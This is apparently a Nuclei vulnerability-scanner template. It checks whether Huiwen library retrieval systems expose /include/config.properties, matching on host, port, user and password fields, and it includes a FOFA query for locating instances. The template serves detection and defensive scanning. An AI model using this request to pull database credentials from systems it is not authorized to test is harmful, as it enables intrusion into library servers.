id: huiwen-bibliographic-info-leak

info:
  name: Huiwen library bibliographic Retrieval System - Information Exposure
  author: SleepingBag945
  severity: high
  description: |
    Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="汇文软件-书目检索系统"
  tags: huiwen,exposure,misconfig

http:
  - raw:
      - |
        GET /include/config.properties HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "host="
          - "port="
          - "user="
          - "password="
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a004730450221009276ec63be07e4e125815e320a1ceaaeca3429de1e31c3d944f149edfd3a06500220256c8533dc8a7c0d51ae67c88427c71cafc3385d4f20344d9357248cb938b9f8:922c64590222798bb761d5b6d8e72950